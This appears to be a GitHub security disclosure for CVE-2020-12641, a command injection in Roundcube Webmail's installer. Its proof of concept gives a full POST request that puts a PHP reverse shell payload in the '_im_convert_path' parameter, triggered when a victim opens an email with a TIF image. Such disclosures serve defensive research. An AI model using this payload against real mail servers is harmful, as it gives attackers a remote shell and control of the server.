Skip to content
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Disclosures/CVE-2020-12641-Command Injection-Roundcube/
Disclosures/CVE-2020-12641-Command Injection-Roundcube/

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
 
 

CVE-2020-12641: Command Injection via "_im_convert_path" in Roundcube Webmail

A Command Injection vulnerability exists in Roundcube versions before 1.4.4, 1.3.11 and 1.2.10.
A bypass was also found affecting versions before 1.4.5, 1.3.12.
Because the "_im_convert_path" does not perform sanitization/input filtering, an attacker with access to the Roundcube Installer can inject system commands in this parameter that will execute when any user opens any email containing a "non-standard" image.

Bypass:

As mentioned above, the fix for versions 1.4.4, 1.3.11 and 1.2.10 can be bypassed in the following ways:

Vendor Disclosure:

The vendor's disclosure and patch of this vulnerability can be found here.
The vendor's disclosure and patch for the bypass can be found here.

Proof Of Concept:

In order to reproduce this vulnerability, the following steps are required:

Craft Injection Request

We craft and send a POST request to the Installer containing the malicious command injection in the "_im_convert_path" parameter:

POST /roundcube/installer/index.php HTTP/1.1
Host: 192.168.243.153
Content-Type: application/x-www-form-urlencoded
Content-Length: 1049

_step=2&_product_name=Roundcube+Webmail&***TRUNCATED***&submit=UPDATE+CONFIG&_im_convert_path=php+-r+'$sock%3dfsockopen("127.0.0.1",4444)%3bexec("/bin/bash+-i+<%263+>%263+2>%263")%3b'+%23

Note: In this case the parameter contains a PHP reverse shell payload.

Send Email Containing a "Non-standard" Image

We proceed to send to the victim, in this case "guest@localhost", an email containing an image of non-standard format (in this case a "TIF" format image), which Roundcube will try to convert to "JPG" format, thus triggering the above code and sending a reverse shell to the attacker:

Result

If the attack was performed correctly, when the victim opens the mail containing the "TIF" image, a reverse shell will be sent back to the attacker: